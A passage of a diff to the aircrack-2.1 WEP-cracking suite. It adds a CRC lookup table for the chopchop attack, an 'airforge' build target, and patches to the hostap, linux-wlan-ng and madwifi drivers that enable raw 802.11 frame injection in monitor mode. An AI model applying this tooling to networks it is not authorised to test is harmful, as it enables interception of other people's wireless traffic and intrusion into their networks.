++ 0xBDBDF21C, 0xCABAC28A, 0x53B39330, 0x24B4A3A6, 0xBAD03605, 0xCDD70693, 0x54DE5729, 0x23D967BF,
++ 0xB3667A2E, 0xC4614AB8, 0x5D681B02, 0x2A6F2B94, 0xB40BBE37, 0xC30C8EA1, 0x5A05DF1B, 0x2D02EF8D
++};
++
++const unsigned char crc_chop_tbl[256][4] =
++{
++ { 0x26,0x70,0x6A,0x0F }, { 0x67,0x76,0x1B,0xD4 }, { 0xE5,0x7A,0xF9,0x62 }, { 0xA4,0x7C,0x88,0xB9 },
++ { 0xA0,0x65,0x4C,0xD4 }, { 0xE1,0x63,0x3D,0x0F }, { 0x63,0x6F,0xDF,0xB9 }, { 0x22,0x69,0xAE,0x62 },
++ { 0x6B,0x5D,0x57,0x62 }, { 0x2A,0x5B,0x26,0xB9 }, { 0xA8,0x57,0xC4,0x0F }, { 0xE9,0x51,0xB5,0xD4 },
++ { 0xED,0x48,0x71,0xB9 }, { 0xAC,0x4E,0x00,0x62 }, { 0x2E,0x42,0xE2,0xD4 }, { 0x6F,0x44,0x93,0x0F },
++ { 0xBC,0x2A,0x10,0xD5 }, { 0xFD,0x2C,0x61,0x0E }, { 0x7F,0x20,0x83,0xB8 }, { 0x3E,0x26,0xF2,0x63 },
++ { 0x3A,0x3F,0x36,0x0E }, { 0x7B,0x39,0x47,0xD5 }, { 0xF9,0x35,0xA5,0x63 }, { 0xB8,0x33,0xD4,0xB8 },
++ { 0xF1,0x07,0x2D,0xB8 }, { 0xB0,0x01,0x5C,0x63 }, { 0x32,0x0D,0xBE,0xD5 }, { 0x73,0x0B,0xCF,0x0E },
++ { 0x77,0x12,0x0B,0x63 }, { 0x36,0x14,0x7A,0xB8 }, { 0xB4,0x18,0x98,0x0E }, { 0xF5,0x1E,0xE9,0xD5 },
++ { 0x53,0xC3,0xEF,0x60 }, { 0x12,0xC5,0x9E,0xBB }, { 0x90,0xC9,0x7C,0x0D }, { 0xD1,0xCF,0x0D,0xD6 },
++ { 0xD5,0xD6,0xC9,0xBB }, { 0x94,0xD0,0xB8,0x60 }, { 0x16,0xDC,0x5A,0xD6 }, { 0x57,0xDA,0x2B,0x0D },
++ { 0x1E,0xEE,0xD2,0x0D }, { 0x5F,0xE8,0xA3,0xD6 }, { 0xDD,0xE4,0x41,0x60 }, { 0x9C,0xE2,0x30,0xBB },
++ { 0x98,0xFB,0xF4,0xD6 }, { 0xD9,0xFD,0x85,0x0D }, { 0x5B,0xF1,0x67,0xBB }, { 0x1A,0xF7,0x16,0x60 },
++ { 0xC9,0x99,0x95,0xBA }, { 0x88,0x9F,0xE4,0x61 }, { 0x0A,0x93,0x06,0xD7 }, { 0x4B,0x95,0x77,0x0C },
++ { 0x4F,0x8C,0xB3,0x61 }, { 0x0E,0x8A,0xC2,0xBA }, { 0x8C,0x86,0x20,0x0C }, { 0xCD,0x80,0x51,0xD7 },
++ { 0x84,0xB4,0xA8,0xD7 }, { 0xC5,0xB2,0xD9,0x0C }, { 0x47,0xBE,0x3B,0xBA }, { 0x06,0xB8,0x4A,0x61 },
++ { 0x02,0xA1,0x8E,0x0C }, { 0x43,0xA7,0xFF,0xD7 }, { 0xC1,0xAB,0x1D,0x61 }, { 0x80,0xAD,0x6C,0xBA },
++ { 0xCC,0x16,0x61,0xD0 }, { 0x8D,0x10,0x10,0x0B }, { 0x0F,0x1C,0xF2,0xBD }, { 0x4E,0x1A,0x83,0x66 },
++ { 0x4A,0x03,0x47,0x0B }, { 0x0B,0x05,0x36,0xD0 }, { 0x89,0x09,0xD4,0x66 }, { 0xC8,0x0F,0xA5,0xBD },
++ { 0x81,0x3B,0x5C,0xBD }, { 0xC0,0x3D,0x2D,0x66 }, { 0x42,0x31,0xCF,0xD0 }, { 0x03,0x37,0xBE,0x0B },
++ { 0x07,0x2E,0x7A,0x66 }, { 0x46,0x28,0x0B,0xBD }, { 0xC4,0x24,0xE9,0x0B }, { 0x85,0x22,0x98,0xD0 },
++ { 0x56,0x4C,0x1B,0x0A }, { 0x17,0x4A,0x6A,0xD1 }, { 0x95,0x46,0x88,0x67 }, { 0xD4,0x40,0xF9,0xBC },
++ { 0xD0,0x59,0x3D,0xD1 }, { 0x91,0x5F,0x4C,0x0A }, { 0x13,0x53,0xAE,0xBC }, { 0x52,0x55,0xDF,0x67 },
++ { 0x1B,0x61,0x26,0x67 }, { 0x5A,0x67,0x57,0xBC }, { 0xD8,0x6B,0xB5,0x0A }, { 0x99,0x6D,0xC4,0xD1 },
++ { 0x9D,0x74,0x00,0xBC }, { 0xDC,0x72,0x71,0x67 }, { 0x5E,0x7E,0x93,0xD1 }, { 0x1F,0x78,0xE2,0x0A },
++ { 0xB9,0xA5,0xE4,0xBF }, { 0xF8,0xA3,0x95,0x64 }, { 0x7A,0xAF,0x77,0xD2 }, { 0x3B,0xA9,0x06,0x09 },
++ { 0x3F,0xB0,0xC2,0x64 }, { 0x7E,0xB6,0xB3,0xBF }, { 0xFC,0xBA,0x51,0x09 }, { 0xBD,0xBC,0x20,0xD2 },
++ { 0xF4,0x88,0xD9,0xD2 }, { 0xB5,0x8E,0xA8,0x09 }, { 0x37,0x82,0x4A,0xBF }, { 0x76,0x84,0x3B,0x64 },
++ { 0x72,0x9D,0xFF,0x09 }, { 0x33,0x9B,0x8E,0xD2 }, { 0xB1,0x97,0x6C,0x64 }, { 0xF0,0x91,0x1D,0xBF },
++ { 0x23,0xFF,0x9E,0x65 }, { 0x62,0xF9,0xEF,0xBE }, { 0xE0,0xF5,0x0D,0x08 }, { 0xA1,0xF3,0x7C,0xD3 },
++ { 0xA5,0xEA,0xB8,0xBE }, { 0xE4,0xEC,0xC9,0x65 }, { 0x66,0xE0,0x2B,0xD3 }, { 0x27,0xE6,0x5A,0x08 },
++ { 0x6E,0xD2,0xA3,0x08 }, { 0x2F,0xD4,0xD2,0xD3 }, { 0xAD,0xD8,0x30,0x65 }, { 0xEC,0xDE,0x41,0xBE },
++ { 0xE8,0xC7,0x85,0xD3 }, { 0xA9,0xC1,0xF4,0x08 }, { 0x2B,0xCD,0x16,0xBE }, { 0x6A,0xCB,0x67,0x65 },
++ { 0xB3,0xBB,0x0D,0x6A }, { 0xF2,0xBD,0x7C,0xB1 }, { 0x70,0xB1,0x9E,0x07 }, { 0x31,0xB7,0xEF,0xDC },
++ { 0x35,0xAE,0x2B,0xB1 }, { 0x74,0xA8,0x5A,0x6A }, { 0xF6,0xA4,0xB8,0xDC }, { 0xB7,0xA2,0xC9,0x07 },
++ { 0xFE,0x96,0x30,0x07 }, { 0xBF,0x90,0x41,0xDC }, { 0x3D,0x9C,0xA3,0x6A }, { 0x7C,0x9A,0xD2,0xB1 },
++ { 0x78,0x83,0x16,0xDC }, { 0x39,0x85,0x67,0x07 }, { 0xBB,0x89,0x85,0xB1 }, { 0xFA,0x8F,0xF4,0x6A },
++ { 0x29,0xE1,0x77,0xB0 }, { 0x68,0xE7,0x06,0x6B }, { 0xEA,0xEB,0xE4,0xDD }, { 0xAB,0xED,0x95,0x06 },
++ { 0xAF,0xF4,0x51,0x6B }, { 0xEE,0xF2,0x20,0xB0 }, { 0x6C,0xFE,0xC2,0x06 }, { 0x2D,0xF8,0xB3,0xDD },
++ { 0x64,0xCC,0x4A,0xDD }, { 0x25,0xCA,0x3B,0x06 }, { 0xA7,0xC6,0xD9,0xB0 }, { 0xE6,0xC0,0xA8,0x6B },
++ { 0xE2,0xD9,0x6C,0x06 }, { 0xA3,0xDF,0x1D,0xDD }, { 0x21,0xD3,0xFF,0x6B }, { 0x60,0xD5,0x8E,0xB0 },
++ { 0xC6,0x08,0x88,0x05 }, { 0x87,0x0E,0xF9,0xDE }, { 0x05,0x02,0x1B,0x68 }, { 0x44,0x04,0x6A,0xB3 },
++ { 0x40,0x1D,0xAE,0xDE }, { 0x01,0x1B,0xDF,0x05 }, { 0x83,0x17,0x3D,0xB3 }, { 0xC2,0x11,0x4C,0x68 },
++ { 0x8B,0x25,0xB5,0x68 }, { 0xCA,0x23,0xC4,0xB3 }, { 0x48,0x2F,0x26,0x05 }, { 0x09,0x29,0x57,0xDE },
++ { 0x0D,0x30,0x93,0xB3 }, { 0x4C,0x36,0xE2,0x68 }, { 0xCE,0x3A,0x00,0xDE }, { 0x8F,0x3C,0x71,0x05 },
++ { 0x5C,0x52,0xF2,0xDF }, { 0x1D,0x54,0x83,0x04 }, { 0x9F,0x58,0x61,0xB2 }, { 0xDE,0x5E,0x10,0x69 },
++ { 0xDA,0x47,0xD4,0x04 }, { 0x9B,0x41,0xA5,0xDF }, { 0x19,0x4D,0x47,0x69 }, { 0x58,0x4B,0x36,0xB2 },
++ { 0x11,0x7F,0xCF,0xB2 }, { 0x50,0x79,0xBE,0x69 }, { 0xD2,0x75,0x5C,0xDF }, { 0x93,0x73,0x2D,0x04 },
++ { 0x97,0x6A,0xE9,0x69 }, { 0xD6,0x6C,0x98,0xB2 }, { 0x54,0x60,0x7A,0x04 }, { 0x15,0x66,0x0B,0xDF },
++ { 0x59,0xDD,0x06,0xB5 }, { 0x18,0xDB,0x77,0x6E }, { 0x9A,0xD7,0x95,0xD8 }, { 0xDB,0xD1,0xE4,0x03 },
++ { 0xDF,0xC8,0x20,0x6E }, { 0x9E,0xCE,0x51,0xB5 }, { 0x1C,0xC2,0xB3,0x03 }, { 0x5D,0xC4,0xC2,0xD8 },
++ { 0x14,0xF0,0x3B,0xD8 }, { 0x55,0xF6,0x4A,0x03 }, { 0xD7,0xFA,0xA8,0xB5 }, { 0x96,0xFC,0xD9,0x6E },
++ { 0x92,0xE5,0x1D,0x03 }, { 0xD3,0xE3,0x6C,0xD8 }, { 0x51,0xEF,0x8E,0x6E }, { 0x10,0xE9,0xFF,0xB5 },
++ { 0xC3,0x87,0x7C,0x6F }, { 0x82,0x81,0x0D,0xB4 }, { 0x00,0x8D,0xEF,0x02 }, { 0x41,0x8B,0x9E,0xD9 },
++ { 0x45,0x92,0x5A,0xB4 }, { 0x04,0x94,0x2B,0x6F }, { 0x86,0x98,0xC9,0xD9 }, { 0xC7,0x9E,0xB8,0x02 },
++ { 0x8E,0xAA,0x41,0x02 }, { 0xCF,0xAC,0x30,0xD9 }, { 0x4D,0xA0,0xD2,0x6F }, { 0x0C,0xA6,0xA3,0xB4 },
++ { 0x08,0xBF,0x67,0xD9 }, { 0x49,0xB9,0x16,0x02 }, { 0xCB,0xB5,0xF4,0xB4 }, { 0x8A,0xB3,0x85,0x6F },
++ { 0x2C,0x6E,0x83,0xDA }, { 0x6D,0x68,0xF2,0x01 }, { 0xEF,0x64,0x10,0xB7 }, { 0xAE,0x62,0x61,0x6C },
++ { 0xAA,0x7B,0xA5,0x01 }, { 0xEB,0x7D,0xD4,0xDA }, { 0x69,0x71,0x36,0x6C }, { 0x28,0x77,0x47,0xB7 },
++ { 0x61,0x43,0xBE,0xB7 }, { 0x20,0x45,0xCF,0x6C }, { 0xA2,0x49,0x2D,0xDA }, { 0xE3,0x4F,0x5C,0x01 },
++ { 0xE7,0x56,0x98,0x6C }, { 0xA6,0x50,0xE9,0xB7 }, { 0x24,0x5C,0x0B,0x01 }, { 0x65,0x5A,0x7A,0xDA },
++ { 0xB6,0x34,0xF9,0x00 }, { 0xF7,0x32,0x88,0xDB }, { 0x75,0x3E,0x6A,0x6D }, { 0x34,0x38,0x1B,0xB6 },
++ { 0x30,0x21,0xDF,0xDB }, { 0x71,0x27,0xAE,0x00 }, { 0xF3,0x2B,0x4C,0xB6 }, { 0xB2,0x2D,0x3D,0x6D },
++ { 0xFB,0x19,0xC4,0x6D }, { 0xBA,0x1F,0xB5,0xB6 }, { 0x38,0x13,0x57,0x00 }, { 0x79,0x15,0x26,0xDB },
++ { 0x7D,0x0C,0xE2,0xB6 }, { 0x3C,0x0A,0x93,0x6D }, { 0xBE,0x06,0x71,0xDB }, { 0xFF,0x00,0x00,0x00 }
++};
++
++#endif /* crctable.h */
+diff -urN aircrack-2.1.orig/Makefile aircrack-2.1/Makefile
+--- aircrack-2.1.orig/Makefile 2004-10-01 21:30:00.000000000 +0200
++++ aircrack-2.1/Makefile 2005-04-22 08:53:15.398815552 +0200
+@@ -7,13 +7,14 @@
+ docdir = $(datadir)/aircrack
+
+ DESTDIR =
+-BINFILES = 802ether aircrack aireplay airodump hopper.sh
++BINFILES = 802ether aircrack aireplay airodump airforge hopper.sh
+ DOCFILES = ChangeLog rawsend.patch docs/aircrack.html
+
+ all:
+ $(CC) $(CFLAGS) $(OPTFLAGS) 802ether.c -o 802ether
+ $(CC) $(CFLAGS) $(OPTFLAGS) aircrack.c -o aircrack
+ $(CC) $(CFLAGS) $(OPTFLAGS) aireplay.c -o aireplay
++ $(CC) $(CFLAGS) $(OPTFLAGS) airforge.c -o airforge
+ $(CC) $(CFLAGS) $(OPTFLAGS) airodump.c -o airodump
+
+ install:
+@@ -25,4 +26,4 @@
+ install -m 644 $(DOCFILES) $(DESTDIR)$(docdir)
+
+ clean:
+- rm -f *.o 802ether aircrack aireplay airodump
++ rm -f *.o 802ether aircrack aireplay airforge airodump
+diff -urN aircrack-2.1.orig/patch/hostap-driver-0.3.7.patch.0.1 aircrack-2.1/patch/hostap-driver-0.3.7.patch.0.1
+--- aircrack-2.1.orig/patch/hostap-driver-0.3.7.patch.0.1 1970-01-01 01:00:00.000000000 +0100
++++ aircrack-2.1/patch/hostap-driver-0.3.7.patch.0.1 2005-04-22 08:51:21.935064664 +0200
+@@ -0,0 +1,12 @@
++diff -aur hostap-driver-0.3.7-orig/driver/modules/hostap_80211_tx.c hostap-driver-0.3.7/driver/modules/hostap_80211_tx.c
++--- hostap-driver-0.3.7-orig/driver/modules/hostap_80211_tx.c 2004-07-06 01:45:01.000000000 +0200
+++++ hostap-driver-0.3.7/driver/modules/hostap_80211_tx.c 2005-03-14 13:53:20.000000000 +0100
++@@ -466,7 +466,7 @@
++ goto fail;
++ }
++
++- if (tx.crypt) {
+++ if (tx.crypt && memcmp(tx.crypt->priv+4,"\x01\x02\x04\x08\x10",5)) {
++ skb = hostap_tx_encrypt(skb, tx.crypt);
++ if (skb == NULL) {
++ printk(KERN_DEBUG "%s: TX - encryption failed\n",
+diff -urN aircrack-2.1.orig/patch/linux-wlan-ng-0.2.1-pre26.patch.0.1 aircrack-2.1/patch/linux-wlan-ng-0.2.1-pre26.patch.0.1
+--- aircrack-2.1.orig/patch/linux-wlan-ng-0.2.1-pre26.patch.0.1 1970-01-01 01:00:00.000000000 +0100
++++ aircrack-2.1/patch/linux-wlan-ng-0.2.1-pre26.patch.0.1 2005-04-22 08:51:21.936064512 +0200
+@@ -0,0 +1,284 @@
++diff -aur linux-wlan-ng-0.2.1-pre26-orig/src/p80211/p80211netdev.c linux-wlan-ng-0.2.1-pre26/src/p80211/p80211netdev.c
++--- linux-wlan-ng-0.2.1-pre26-orig/src/p80211/p80211netdev.c 2005-01-11 18:43:54.000000000 +0100
+++++ linux-wlan-ng-0.2.1-pre26/src/p80211/p80211netdev.c 2005-03-14 13:58:11.000000000 +0100
++@@ -525,7 +525,7 @@
++ * and return success .
++ * TODO: we need a saner way to handle this
++ */
++- if(skb->protocol != ETH_P_80211_RAW) {
+++ if(skb->protocol != htons(ETH_P_80211_RAW)) {
++ p80211netdev_start_queue(wlandev);
++ WLAN_LOG_NOTICE(
++ "Tx attempt prior to association, frame dropped.\n");
++@@ -537,7 +537,7 @@
++ }
++
++ /* Check for raw transmits */
++- if(skb->protocol == ETH_P_80211_RAW) {
+++ if(skb->protocol == htons(ETH_P_80211_RAW)) {
++ if (!capable(CAP_NET_ADMIN)) {
++ return(-EPERM);
++ }
++@@ -965,8 +965,9 @@
++ dev->set_mac_address = p80211knetdev_set_mac_address;
++ #endif
++ #ifdef HAVE_TX_TIMEOUT
++- dev->tx_timeout = &p80211knetdev_tx_timeout;
++- dev->watchdog_timeo = (wlan_watchdog * HZ) / 1000;
+++// KoreK: still not implemented
+++// dev->tx_timeout = &p80211knetdev_tx_timeout;
+++// dev->watchdog_timeo = (wlan_watchdog * HZ) / 1000;
++ #endif
++
++ }
++diff -aur linux-wlan-ng-0.2.1-pre26-orig/src/prism2/driver/Makefile linux-wlan-ng-0.2.1-pre26/src/prism2/driver/Makefile
++--- linux-wlan-ng-0.2.1-pre26-orig/src/prism2/driver/Makefile 2005-01-25 02:41:44.000000000 +0100
+++++ linux-wlan-ng-0.2.1-pre26/src/prism2/driver/Makefile 2005-03-14 13:58:11.000000000 +0100
++@@ -88,7 +88,7 @@
++ MODVERDIR=$(WLAN_SRC)/.tmp_versions modules
++ else # kbuild 2.4
++
++- $(MAKE) -C $(LINUX_SRC) SUBDIRS=$(PWD) WLAN_SRC=$(PWD) \
+++ $(MAKE) -C $(LINUX_SRC) SUBDIRS=$(PWD) WLAN_SRC=$(WLAN_SRC) \
++ modules
++
++ endif # kbuild switch
++diff -aur linux-wlan-ng-0.2.1-pre26-orig/src/prism2/driver/hfa384x.c linux-wlan-ng-0.2.1-pre26/src/prism2/driver/hfa384x.c
++--- linux-wlan-ng-0.2.1-pre26-orig/src/prism2/driver/hfa384x.c 2005-01-25 01:38:50.000000000 +0100
+++++ linux-wlan-ng-0.2.1-pre26/src/prism2/driver/hfa384x.c 2005-03-14 15:21:02.000000000 +0100
++@@ -1941,8 +1941,14 @@
++
++ DBFENTER;
++
++- cmd.cmd = HFA384x_CMD_CMDCODE_SET(HFA384x_CMDCODE_MONITOR) |
++- HFA384x_CMD_AINFO_SET(enable);
+++ if (enable == HFA384x_MONITOR_ENABLE) {
+++ // KoreK: get into test mode 0x0a
+++ cmd.cmd = HFA384x_CMD_CMDCODE_SET(HFA384x_CMDCODE_MONITOR) |
+++ HFA384x_CMD_AINFO_SET(0x0a);
+++ } else {
+++ cmd.cmd = HFA384x_CMD_CMDCODE_SET(HFA384x_CMDCODE_MONITOR) |
+++ HFA384x_CMD_AINFO_SET(enable);
+++ }
++ cmd.parm0 = 0;
++ cmd.parm1 = 0;
++ cmd.parm2 = 0;
++@@ -3178,13 +3184,26 @@
++ HFA384x_TX_TXEX_SET(0) | HFA384x_TX_TXOK_SET(0);
++ #endif
++
++- /* if we're using host WEP, increase size by IV+ICV */
++- if (p80211_wep->data) {
++- txdesc.data_len = host2hfa384x_16(skb->len+8);
++- // txdesc.tx_control |= HFA384x_TX_NOENCRYPT_SET(1);
++- } else {
++- txdesc.data_len = host2hfa384x_16(skb->len);
++- }
+++ if (skb->protocol != htons(ETH_P_80211_RAW)) {
+++ /* if we're using host WEP, increase size by IV+ICV */
+++ if (p80211_wep->data) {
+++ txdesc.data_len = host2hfa384x_16(skb->len+8);
+++ // txdesc.tx_control |= HFA384x_TX_NOENCRYPT_SET(1);
+++ } else {
+++ txdesc.data_len = host2hfa384x_16(skb->len);
+++ }
+++ } else {
+++ /* KoreK: raw injection (monitor mode): pull the rest of
+++ the header and ssanity check on txdesc.data_len */
+++ memcpy(&(txdesc.data_len), skb->data, 16);
+++ skb_pull(skb,16);
+++ if (txdesc.data_len != host2hfa384x_16(skb->len)) {
+++ printk(KERN_DEBUG "mismatch frame_len, drop frame\n");
+++ return 0;
+++ }
+++
+++ txdesc.tx_control |= HFA384x_TX_RETRYSTRAT_SET(1);
+++ }
++
++ txdesc.tx_control = host2hfa384x_16(txdesc.tx_control);
++ /* copy the header over to the txdesc */
++@@ -3207,7 +3226,7 @@
++ spin_lock(&hw->cmdlock);
++
++ /* Copy descriptor+payload to FID */
++- if (p80211_wep->data) {
+++ if (p80211_wep->data && (skb->protocol != htons(ETH_P_80211_RAW))) {
++ result = hfa384x_copy_to_bap4(hw, HFA384x_BAP_PROC, fid, 0,
++ &txdesc, sizeof(txdesc),
++ p80211_wep->iv, sizeof(p80211_wep->iv),
++@@ -3657,6 +3676,16 @@
++ switch( HFA384x_RXSTATUS_MACPORT_GET(rxdesc.status) )
++ {
++ case 0:
+++ /* KoreK: this testmode uses macport 0 */
+++ if ((wlandev->netdev->type == ARPHRD_IEEE80211) ||
+++ (wlandev->netdev->type == ARPHRD_IEEE80211_PRISM)) {
+++ if ( ! HFA384x_RXSTATUS_ISFCSERR(rxdesc.status) ) {
+++ hfa384x_int_rxmonitor( wlandev, rxfid, &rxdesc);
+++ } else {
+++ WLAN_LOG_DEBUG(3,"Received monitor frame: FCSerr set\n");
+++ }
+++ goto done;
+++ }
++
++ fc = ieee2host16(rxdesc.frame_control);
++
++diff -aur linux-wlan-ng-0.2.1-pre26-orig/src/prism2/driver/hfa384x_usb.c linux-wlan-ng-0.2.1-pre26/src/prism2/driver/hfa384x_usb.c
++--- linux-wlan-ng-0.2.1-pre26-orig/src/prism2/driver/hfa384x_usb.c 2005-01-17 17:24:40.000000000 +0100
+++++ linux-wlan-ng-0.2.1-pre26/src/prism2/driver/hfa384x_usb.c 2005-03-14 15:27:57.000000000 +0100
++@@ -1143,8 +1143,14 @@
++
++ DBFENTER;
++
++- cmd.cmd = HFA384x_CMD_CMDCODE_SET(HFA384x_CMDCODE_MONITOR) |
++- HFA384x_CMD_AINFO_SET(enable);
+++ if (enable == HFA384x_MONITOR_ENABLE) {
+++ // KoreK: get into test mode 0x0a
+++ cmd.cmd = HFA384x_CMD_CMDCODE_SET(HFA384x_CMDCODE_MONITOR) |
+++ HFA384x_CMD_AINFO_SET(0x0a);
+++ } else {
+++ cmd.cmd = HFA384x_CMD_CMDCODE_SET(HFA384x_CMDCODE_MONITOR) |
+++ HFA384x_CMD_AINFO_SET(enable);
+++ }
++ cmd.parm0 = 0;
++ cmd.parm1 = 0;
++ cmd.parm2 = 0;
++@@ -3258,37 +3264,59 @@
++ HFA384x_TX_MACPORT_SET(0) | HFA384x_TX_STRUCTYPE_SET(1) |
++ HFA384x_TX_TXEX_SET(0) | HFA384x_TX_TXOK_SET(0);
++ #endif
++- hw->txbuff.txfrm.desc.tx_control =
++- host2hfa384x_16(hw->txbuff.txfrm.desc.tx_control);
++
++- /* copy the header over to the txdesc */
++- memcpy(&(hw->txbuff.txfrm.desc.frame_control), p80211_hdr, sizeof(p80211_hdr_t));
+++ if (skb->protocol != htons(ETH_P_80211_RAW)) {
+++ hw->txbuff.txfrm.desc.tx_control =
+++ host2hfa384x_16(hw->txbuff.txfrm.desc.tx_control);
+++
+++ /* copy the header over to the txdesc */
+++ memcpy(&(hw->txbuff.txfrm.desc.frame_control), p80211_hdr,
+++ sizeof(p80211_hdr_t));
+++
+++ /* if we're using host WEP, increase size by IV+ICV */
+++ if (p80211_wep->data) {
+++ hw->txbuff.txfrm.desc.data_len = host2hfa384x_16(skb->len+8);
+++ // hw->txbuff.txfrm.desc.tx_control |= HFA384x_TX_NOENCRYPT_SET(1);
+++ usbpktlen+=8;
+++ } else {
+++ hw->txbuff.txfrm.desc.data_len = host2hfa384x_16(skb->len);
+++ }
+++ } else {
+++ /* KoreK: raw injection (monitor mode): pull the rest of
+++ the header and ssanity check on txdesc.data_len */
+++ memcpy(&(hw->txbuff.txfrm.desc.data_len), skb->data, 16);
+++ skb_pull(skb,16);
+++ if (hw->txbuff.txfrm.desc.data_len != host2hfa384x_16(skb->len)) {
+++ printk(KERN_DEBUG "mismatch frame_len, drop frame\n");
+++ return 0;
+++ }
++
++- /* if we're using host WEP, increase size by IV+ICV */
++- if (p80211_wep->data) {
++- hw->txbuff.txfrm.desc.data_len = host2hfa384x_16(skb->len+8);
++- // hw->txbuff.txfrm.desc.tx_control |= HFA384x_TX_NOENCRYPT_SET(1);
++- usbpktlen+=8;
++- } else {
++- hw->txbuff.txfrm.desc.data_len = host2hfa384x_16(skb->len);
+++ hw->txbuff.txfrm.desc.tx_control |= HFA384x_TX_RETRYSTRAT_SET(1);
+++ hw->txbuff.txfrm.desc.tx_control =
+++ host2hfa384x_16(hw->txbuff.txfrm.desc.tx_control);
+++
+++ /* copy the header over to the txdesc */
+++ memcpy(&(hw->txbuff.txfrm.desc.frame_control), p80211_hdr,
+++ sizeof(p80211_hdr_t));
++ }
++
++ usbpktlen += skb->len;
++
++ /* copy over the WEP IV if we are using host WEP */
++ ptr = hw->txbuff.txfrm.data;
++- if (p80211_wep->data) {
+++ if (p80211_wep->data && skb->protocol != htons(ETH_P_80211_RAW)) {
++ memcpy(ptr, p80211_wep->iv, sizeof(p80211_wep->iv));
++ ptr+= sizeof(p80211_wep->iv);
++ memcpy(ptr, p80211_wep->data, skb->len);
++ } else {
++ memcpy(ptr, skb->data, skb->len);
++ }
+++
++ /* copy over the packet data */
++ ptr+= skb->len;
++
++ /* copy over the WEP ICV if we are using host WEP */
++- if (p80211_wep->data) {
+++ if (p80211_wep->data && skb->protocol != htons(ETH_P_80211_RAW)) {
++ memcpy(ptr, p80211_wep->icv, sizeof(p80211_wep->icv));
++ }
++
++@@ -4105,6 +4133,17 @@
++ switch( HFA384x_RXSTATUS_MACPORT_GET(usbin->rxfrm.desc.status))
++ {
++ case 0:
+++ /* KoreK: this testmode uses macport 0 */
+++ if ((wlandev->netdev->type == ARPHRD_IEEE80211) ||
+++ (wlandev->netdev->type == ARPHRD_IEEE80211_PRISM)) {
+++ if ( ! HFA384x_RXSTATUS_ISFCSERR(usbin->rxfrm.desc.status) ) {
+++ hfa384x_int_rxmonitor(wlandev, &usbin->rxfrm);
+++ } else {
+++ WLAN_LOG_DEBUG(3,"Received monitor frame: FCSerr set\n");
+++ }
+++ goto done;
+++ }
+++
++ w_hdr = (p80211_hdr_t *) &(usbin->rxfrm.desc.frame_control);
++ fc = ieee2host16(usbin->rxfrm.desc.frame_control);
++
++diff -aur linux-wlan-ng-0.2.1-pre26-orig/src/prism2/driver/prism2mgmt.c linux-wlan-ng-0.2.1-pre26/src/prism2/driver/prism2mgmt.c
++--- linux-wlan-ng-0.2.1-pre26-orig/src/prism2/driver/prism2mgmt.c 2005-01-25 01:38:50.000000000 +0100
+++++ linux-wlan-ng-0.2.1-pre26/src/prism2/driver/prism2mgmt.c 2005-03-14 13:58:11.000000000 +0100
++@@ -2855,9 +2855,10 @@
++ }
++
++ /* Now if we're already sniffing, we can skip the rest */
++- if (wlandev->netdev->type != ARPHRD_ETHER) {
+++ if ((wlandev->netdev->type != ARPHRD_IEEE80211) &&
+++ (wlandev->netdev->type != ARPHRD_IEEE80211_PRISM)) {
++ /* Set the port type to pIbss */
++- word = HFA384x_PORTTYPE_PSUEDOIBSS;
+++ word = 5; // HFA384x_PORTTYPE_PSUEDOIBSS;
++ result = hfa384x_drvr_setconfig16(hw,
++ HFA384x_RID_CNFPORTTYPE, word);
++ if ( result ) {
++@@ -2869,6 +2870,8 @@
++ }
++ if ((msg->keepwepflags.status == P80211ENUM_msgitem_status_data_ok) && (msg->keepwepflags.data != P80211ENUM_truth_true)) {
++ /* Set the wepflags for no decryption */
+++ /* doesn't work - done from the CLI */
+++ /* Fix? KoreK */
++ word = HFA384x_WEPFLAGS_DISABLE_TXCRYPT |
++ HFA384x_WEPFLAGS_DISABLE_RXCRYPT;
++ result = hfa384x_drvr_setconfig16(hw, HFA384x_RID_CNFWEPFLAGS, word);
++@@ -2914,7 +2917,8 @@
++ goto failed;
++ }
++
++- if (wlandev->netdev->type == ARPHRD_ETHER) {
+++ if ((wlandev->netdev->type != ARPHRD_IEEE80211) &&
+++ (wlandev->netdev->type != ARPHRD_IEEE80211_PRISM)) {
++ WLAN_LOG_INFO("monitor mode enabled\n");
++ }
++
++diff -aur linux-wlan-ng-0.2.1-pre26-orig/src/prism2/driver/prism2sta.c linux-wlan-ng-0.2.1-pre26/src/prism2/driver/prism2sta.c
++--- linux-wlan-ng-0.2.1-pre26-orig/src/prism2/driver/prism2sta.c 2005-01-25 01:38:50.000000000 +0100
+++++ linux-wlan-ng-0.2.1-pre26/src/prism2/driver/prism2sta.c 2005-03-14 13:58:11.000000000 +0100
++@@ -649,7 +649,8 @@
++ DBFENTER;
++
++ /* If necessary, set the 802.11 WEP bit */
++- if ((wlandev->hostwep & (HOSTWEP_PRIVACYINVOKED | HOSTWEP_ENCRYPT)) == HOSTWEP_PRIVACYINVOKED) {
+++ if (((wlandev->hostwep & (HOSTWEP_PRIVACYINVOKED | HOSTWEP_ENCRYPT)) == HOSTWEP_PRIVACYINVOKED)
+++ && (skb->protocol != htons(ETH_P_80211_RAW))) {
++ p80211_hdr->a3.fc |= host2ieee16(WLAN_SET_FC_ISWEP(1));
++ }
++
+diff -urN aircrack-2.1.orig/patch/madwifi-20050309.patch.0.1 aircrack-2.1/patch/madwifi-20050309.patch.0.1
+--- aircrack-2.1.orig/patch/madwifi-20050309.patch.0.1 1970-01-01 01:00:00.000000000 +0100
++++ aircrack-2.1/patch/madwifi-20050309.patch.0.1 2005-04-22 08:51:21.936064512 +0200
+@@ -0,0 +1,123 @@
++diff -ur madwifi/ath/if_ath.c madwifi-foo/ath/if_ath.c
++--- madwifi/ath/if_ath.c 2005-03-09 14:48:52.000000000 -0500
+++++ madwifi-foo/ath/if_ath.c 2005-03-09 22:02:12.000000000 -0500
++@@ -1113,7 +1113,8 @@
++ /*
++ * Encapsulate the packet for transmission.
++ */
++- skb = ieee80211_encap(ic, skb, &ni);
+++ if (ic->ic_opmode != IEEE80211_M_MONITOR)
+++ skb = ieee80211_encap(ic, skb, &ni);
++ if (skb == NULL) {
++ DPRINTF(sc, ATH_DEBUG_XMIT,
++ "%s: discard, encapsulation failure\n", __func__);
++@@ -2843,7 +2844,7 @@
++ hdrlen = ieee80211_anyhdrsize(wh);
++ pktlen = skb->len;
++
++- if (iswep) {
+++ if (iswep && ic->ic_opmode != IEEE80211_M_MONITOR) {
++ const struct ieee80211_cipher *cip;
++ struct ieee80211_key *k;
++
++@@ -2905,7 +2906,7 @@
++ * use short preamble based on the current mode and
++ * negotiated parameters.
++ */
